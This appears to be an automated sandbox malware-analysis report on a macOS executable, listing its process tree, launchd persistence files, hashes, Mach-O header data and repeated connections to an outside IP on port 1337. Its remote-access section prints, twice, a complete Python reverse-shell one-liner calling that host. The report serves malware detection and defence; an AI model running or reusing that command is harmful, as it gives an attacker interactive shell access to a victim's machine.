Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.305 -> queries PID 305Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.304 -> queries PID 304Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.303 -> queries PID 303Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.301 -> queries PID 301Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.300 -> queries PID 300Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.299 -> queries PID 299Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.298 -> queries PID 298Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.296 -> queries PID 296Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.295 -> queries PID 295Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.294 -> queries PID 294Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.291 -> queries PID 291Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.287 -> queries PID 287Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.286 -> queries PID 286Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.285 -> queries PID 285Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.284 -> queries PID 284Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.282 -> queries PID 282Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.280 -> queries PID 280Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.279 -> queries PID 279Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.278 -> queries PID 278Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.277 -> queries PID 277Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.276 -> queries PID 276Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.275 -> queries PID 275Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.274 -> queries PID 274Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.273 -> queries PID 273Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.272 -> queries PID 272Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.271 -> queries PID 271Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.269 -> queries PID 269Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.268 -> queries PID 268Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.267 -> queries PID 267Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.266 -> queries PID 266Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.265 -> queries PID 265Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.264 -> queries PID 264Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.263 -> queries PID 263Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.262 -> queries PID 262Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.261 -> queries PID 261Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.260 -> queries PID 260Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.259 -> queries PID 259Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.258 -> queries PID 258Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.257 -> queries PID 257Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.256 -> queries PID 256Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.255 -> queries PID 255Jump to behavior
Reads the systems OS release and/or type
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552) Sysctl requested: kern.osrelease (1.2)
Reads the systems hostname
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 553) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 555) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 556) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 559) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 562) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 564) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 565) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 567) Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 568) Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 571) Sysctl requested: kern.hostname (1.10)
Source: /var/root/script.sh (PID: 570) Sysctl requested: kern.hostname (1.10)
Reads the system or server version plist file
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 572) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 574) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist

Remote Access Functionality:

Creates a reverse shell via Python
Source: /usr/bin/python Python command: python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python Python command: python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])
Writes files containing IP addresses of contacted hosts (e.g. command and control server)
Source: global traffic and dropped files IP 185.243.115.230 found in file: /private/tmp/script.sh


Runtime Messages

Command:/Users/henry/Desktop/g70Ei8kMg7
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

[Behavior graph: ID 56289, Sample: g70Ei8kMg7, Startdate: 03/07/2018, Architecture: MAC, Score: 60]

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is mac1
  • mono-sgen32 (PID: 552 PPID: 505 MD5: 8910349f44a940d8d79318367855b236)
  • g70Ei8kMg7 (PID: 552 PPID: 505 Overlayed Process Image: mono-sgen32 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • g70Ei8kMg7 (PID: 553 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 553 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 554 PPID: 553 MD5: 60ac5909d06d86e22aace3a863b13690)
      • chown (PID: 554 PPID: 553 Overlayed Process Image: sudo MD5: cc600d309dc91e491f52c51e0b1821ec)
    • g70Ei8kMg7 (PID: 555 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 555 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 555 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 556 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 556 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 557 PPID: 556 MD5: 60ac5909d06d86e22aace3a863b13690)
      • chmod (PID: 557 PPID: 556 Overlayed Process Image: sudo MD5: 30e3e10a3e7ad9adfd37662b2e9b4f8a)
    • g70Ei8kMg7 (PID: 558 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 558 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 558 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 559 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 559 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 560 PPID: 559 MD5: 60ac5909d06d86e22aace3a863b13690)
      • mv (PID: 560 PPID: 559 Overlayed Process Image: sudo MD5: 7f791dd4bef08d618fece911d6e3398a)
    • g70Ei8kMg7 (PID: 561 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 561 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 561 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 562 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 562 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 563 PPID: 562 MD5: 60ac5909d06d86e22aace3a863b13690)
      • mv (PID: 563 PPID: 562 Overlayed Process Image: sudo MD5: 7f791dd4bef08d618fece911d6e3398a)
    • g70Ei8kMg7 (PID: 564 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 564 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 564 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 565 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 565 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 566 PPID: 565 MD5: 60ac5909d06d86e22aace3a863b13690)
      • chown (PID: 566 PPID: 565 Overlayed Process Image: sudo MD5: cc600d309dc91e491f52c51e0b1821ec)
    • g70Ei8kMg7 (PID: 567 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 567 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 567 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
    • g70Ei8kMg7 (PID: 568 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sudo (PID: 568 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 60ac5909d06d86e22aace3a863b13690)
      • sudo (PID: 569 PPID: 568 MD5: 60ac5909d06d86e22aace3a863b13690)
      • launchctl (PID: 569 PPID: 568 Overlayed Process Image: sudo MD5: 17fad4b994d600d0a5b6bc02b55c2c80)
    • g70Ei8kMg7 (PID: 571 PPID: 552 MD5: 7130faced98c800e6d8b1c42eca7d3dc)
    • sh (PID: 571 PPID: 552 Overlayed Process Image: g70Ei8kMg7 MD5: 8aa60b22a5d30418a002b340989384dc)
    • ps (PID: 571 PPID: 552 Overlayed Process Image: sh MD5: 792e18b1417ac1f184680d2423206e4f)
  • xpcproxy (PID: 570 PPID: 1 MD5: d1bb9a4899f0af921e8188218b20d744)
  • script.sh (PID: 570 PPID: 1 Overlayed Process Image: xpcproxy MD5: e26e3fe247d795ea2d21f3eb4e070871)
    • bash (PID: 572 PPID: 570 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • python (PID: 572 PPID: 570 Overlayed Process Image: bash MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 572 PPID: 570 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
    • bash (PID: 573 PPID: 570 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • sleep (PID: 573 PPID: 570 Overlayed Process Image: bash MD5: cd4336ba78cb5b78f50d0f935036c332)
    • bash (PID: 574 PPID: 570 MD5: a17c5d0e7f7f4f69c6218066c2a3e1b6)
    • python (PID: 574 PPID: 570 Overlayed Process Image: bash MD5: 2464fd41f7cf319d0e5c61a7643af77e)
    • Python (PID: 574 PPID: 570 Overlayed Process Image: python MD5: ba780ab677147d9db60c564ef3f51dd0)
  • cleanup

Created / dropped Files

/dev/null
Process:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File Type:ASCII text
Size (bytes):271
Entropy (8bit):4.93296801346042
Encrypted:false
MD5:ED68C6643CE7E329B4E2F7CD935E4F76
SHA1:E195C22FB2CAECCD00BD02B8B8706F024474E972
SHA-256:120E8BF09DC1E0D527051BDF7D819B87C14C819078F2532BE5478D4477FCC8E9
SHA-512:60F2222355448AE64596C0504DD53F2725DC5F69B9FC9003320A9A2647DABDAB912608C6C78B10E34994FCF7021B1775DF95C40B70F7B1248CC08C4AD2C6A666
Malicious:false
Reputation:low

/private/tmp/com.startup.plist
Process:/Users/henry/Desktop/g70Ei8kMg7
File Type:XML document text
Size (bytes):356
Entropy (8bit):5.217648607385835
Encrypted:false
MD5:7DE4694985A438E0B81AF81F5A297B6A
SHA1:C031AA6175F24BAEE319D1C8001979AECE1DC2C3
SHA-256:80263952FF0B747297A041CEB546222C1216D70F09DF8EAFDC84645633E639CF
SHA-512:D5F8549DB0DA0730B277ED1B548389C209311E87309E60E3AC2F8C7D917FFBA670957DA4A8CDB203DD07F1D62074A62ABFBF1F605E2F1F8FD4A5336EAFDD41E9
Malicious:false
Reputation:low

/private/tmp/script.sh
Process:/Users/henry/Desktop/g70Ei8kMg7
File Type:Bourne-Again shell script text executable
Size (bytes):274
Entropy (8bit):5.27902207594642
Encrypted:false
MD5:E26E3FE247D795EA2D21F3EB4E070871
SHA1:15A4F216BBA34A9D289E4FB182BF378953EF900F
SHA-256:E0E0F0EB94293938AB2F0A5A4A6B8D669357638EE5ECFEA7AA9ED537BD93BF0B
SHA-512:DA3939C5E1A9196306D3E859682EB9A514A1C745D86DBBC3696C68DFF8FAA0BD26E09A1D77F42F7E294A95A77F6D111F3F802ABDD7681E2CC1B8B7168CFB6EF4
Malicious:true
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

Public

IP: 185.243.115.230
Country: unknown
ASN: 60781
ASN Name: LEASEWEB-NLNetherlandsNL
Malicious: true

Static File Info

General

File type:Mach-O 64-bit executable
Entropy (8bit):6.3859803821024785
TrID:
  • Mac OS X Mach-O 64bit Intel executable (20004/1) 70.18%
  • Java Script (6500/0) 22.80%
  • Java Script embedded in Visual Basic Script (2000/0) 7.02%
File name:g70Ei8kMg7
File size:35423119
MD5:7130faced98c800e6d8b1c42eca7d3dc
SHA1:3bb644b8d74850f5b0da14c18a75659c45affcf9
SHA256:ced05b1f429ade707691b04f59d7929961661963311b768d438317f4d3d82953
SHA512:8ef5158a4f3d5c70ac27671a48cf873feaffbc7357196fa8b528c3a230d59cc460d4b6a351575b4cd1e947f985bc1633b4285b8e8c3fbed8b989254ed952abc4

Static Mach Info

General Informations for header0

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:16
segment_command_64
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4294967296
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command_64
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize21938176
nsects9
flags0
filesize21938176
vmaddr4294967296
initprot5
Datassectname__text
segname__TEXT
reloff0
addr4294970880
align8
nreloc0
flags2147484672
offset3584
reserved20
reserved10
reserved30
size12377594
sectname__stubs
segname__TEXT
reloff0
addr4307348474
align1
nreloc0
flags2147484680
offset12381178
reserved26
reserved10
reserved30
size3564
sectname__stub_helper
segname__TEXT
reloff0
addr4307352040
align2
nreloc0
flags2147484672
offset12384744
reserved20
reserved10
reserved30
size3826
sectname__cstring
segname__TEXT
reloff0
addr4307355872
align4
nreloc0
flags2
offset12388576
reserved20
reserved10
reserved30
size943759
sectname__const
segname__TEXT
reloff0
addr4308299776
align12
nreloc0
flags0
offset13332480
reserved20
reserved10
reserved30
size6667548
sectname__ustring
segname__TEXT
reloff0
addr4314967328
align4
nreloc0
flags0
offset20000032
reserved20
reserved10
reserved30
size2804
sectname__dof_node
segname__TEXT
reloff0
addr4314970132
align0
nreloc0
flags15
offset20002836
reserved20
reserved10
reserved30
size2206
sectname__unwind_info
segname__TEXT
reloff0
addr4314972340
align2
nreloc0
flags0
offset20005044
reserved20
reserved10
reserved30
size84172
sectname__eh_frame
segname__TEXT
reloff0
addr4315056512
align3
nreloc0
flags0
offset20089216
reserved20
reserved10
reserved30
size1848352
segment_command_64
Name: Value
segname: __DATA
fileoff: 21938176
maxprot: 7
vmsize: 741376
nsects: 12
flags: 0
filesize: 663552
vmaddr: 4316905472
initprot: 3
Datas:

sectname: __program_vars
segname: __DATA
reloff: 0
addr: 4316905472
align: 3
nreloc: 0
flags: 0
offset: 21938176
reserved2: 0
reserved1: 0
reserved3: 0
size: 40

sectname: __nl_symbol_ptr
segname: __DATA
reloff: 0
addr: 4316905512
align: 3
nreloc: 0
flags: 6
offset: 21938216
reserved2: 0
reserved1: 594
reserved3: 0
size: 16

sectname: __got
segname: __DATA
reloff: 0
addr: 4316905528
align: 3
nreloc: 0
flags: 6
offset: 21938232
reserved2: 0
reserved1: 596
reserved3: 0
size: 15368

sectname: __la_symbol_ptr
segname: __DATA
reloff: 0
addr: 4316920896
align: 3
nreloc: 0
flags: 7
offset: 21953600
reserved2: 0
reserved1: 2517
reserved3: 0
size: 4752

sectname: __mod_init_func
segname: __DATA
reloff: 0
addr: 4316925648
align: 3
nreloc: 0
flags: 9
offset: 21958352
reserved2: 0
reserved1: 0
reserved3: 0
size: 296

sectname: __mod_term_func
segname: __DATA
reloff: 0
addr: 4316925944
align: 3
nreloc: 0
flags: 10
offset: 21958648
reserved2: 0
reserved1: 0
reserved3: 0
size: 16

sectname: __const
segname: __DATA
reloff: 0
addr: 4316925968
align: 4
nreloc: 0
flags: 0
offset: 21958672
reserved2: 0
reserved1: 0
reserved3: 0
size: 450456

sectname: __data
segname: __DATA
reloff: 0
addr: 4317376432
align: 4
nreloc: 0
flags: 0
offset: 22409136
reserved2: 0
reserved1: 0
reserved3: 0
size: 190600

sectname: __thread_vars
segname: __DATA
reloff: 0
addr: 4317567032
align: 0
nreloc: 0
flags: 19
offset: 22599736
reserved2: 0
reserved1: 0
reserved3: 0
size: 24

sectname: __thread_bss
segname: __DATA
reloff: 0
addr: 4317567056
align: 2
nreloc: 0
flags: 18
offset: 0
reserved2: 0
reserved1: 0
reserved3: 0
size: 4

sectname: __common
segname: __DATA
reloff: 0
addr: 4317567072
align: 4
nreloc: 0
flags: 1
offset: 0
reserved2: 0
reserved1: 0
reserved3: 0
size: 5272

sectname: __bss
segname: __DATA
reloff: 0
addr: 4317572352
align: 4
nreloc: 0
flags: 1
offset: 0
reserved2: 0
reserved1: 0
reserved3: 0
size: 71031

segment_command_64
Name: Value
segname: __LINKEDIT
fileoff: 22601728
maxprot: 7
vmsize: 12726272
nsects: 0
flags: 0
filesize: 12723860
vmaddr: 4317646848
initprot: 1

dyld_info_command
Name: Value
lazy_bind_size: 10688
lazy_bind_off: 22724664
weak_bind_size: 118840
rebase_size: 0
export_off: 22735352
export_size: 1353488
bind_off: 22601728
rebase_off: 0
bind_size: 4096
weak_bind_off: 22605824

symtab_command
Name: Value
strsize: 7264256
symoff: 24149816
stroff: 28061332
nsyms: 243692

dysymtab_command
Name: Value
extreloff: 0
nlocrel: 0
indirectsymoff: 28048888
modtaboff: 0
nextrel: 0
iundefsym: 243260
nmodtab: 0
ilocalsym: 0
nundefsym: 432
nextrefsyms: 0
locreloff: 0
ntoc: 0
nlocalsym: 210586
tocoff: 0
extrefsymoff: 0
nindirectsyms: 3111
iextdefsym: 210586
nextdefsym: 32674

dylinker_command
Name: Value
name: 12
Data: /usr/lib/dyld

uuid_command
Name: Value
uuid: fc34349212093d9fb6cc7d2d55cf375d

version_min_command
Name: Value
version: 657152
reserved: 658176

dylib_command
Name: Value
compatibility_version: 0.150.0
timestamp: Thu Jan 01 01:00:02 1970
name: 24
current_version: 3584.232.4
Data: /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation

dylib_command
Name: Value
compatibility_version: 0.1.0
timestamp: Thu Jan 01 01:00:02 1970
name: 24
current_version: 2561.202.4
Data: /usr/lib/libSystem.B.dylib

dylib_command
Name: Value
compatibility_version: 0.1.0
timestamp: Thu Jan 01 01:00:02 1970
name: 24
current_version: 256.120.0
Data: /usr/lib/libc++.1.dylib

linkedit_data_command
Name: Value
dataoff: 24088840
datassize: 60976

linkedit_data_command
Name: Value
dataoff: 24149816
datassize: 0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jul 3, 2018 07:37:04.267441988 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:05.269747972 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:06.273696899 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:07.275238037 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:08.279784918 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:09.282298088 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:11.286078930 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:15.291418076 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:23.302539110 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:37:39.319745064 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:11.355443001 MESZ  49275        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:24.523853064 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:25.527010918 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:26.528081894 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:27.528316021 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:28.530971050 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:29.531991005 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:31.533932924 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:35.540324926 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:43.550141096 MESZ  49276        1337       192.168.0.50  185.243.115.230
Jul 3, 2018 07:38:59.567827940 MESZ  49276        1337       192.168.0.50  185.243.115.230

System Behavior

General

Start time:07:37:01
Start date:03/07/2018
Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
File size:3722408 bytes
MD5 hash:8910349f44a940d8d79318367855b236

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/sbin/chown
File size:23312 bytes
MD5 hash:cc600d309dc91e491f52c51e0b1821ec

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:01
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:07:37:01
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:01
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:01
Start date:03/07/2018
Path:/bin/chmod
File size:30016 bytes
MD5 hash:30e3e10a3e7ad9adfd37662b2e9b4f8a

General

Start time:07:37:01
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/mv
File size:24240 bytes
MD5 hash:7f791dd4bef08d618fece911d6e3398a

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/mv
File size:24240 bytes
MD5 hash:7f791dd4bef08d618fece911d6e3398a

General

Start time:07:37:02
Start date:03/07/2018
Path:/Users/henry/Desktop/g70Ei8kMg7
File size:35423119 bytes
MD5 hash:7130faced98c800e6d8b1c42eca7d3dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:07:37:02
Start date:03/07/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:07:37:02
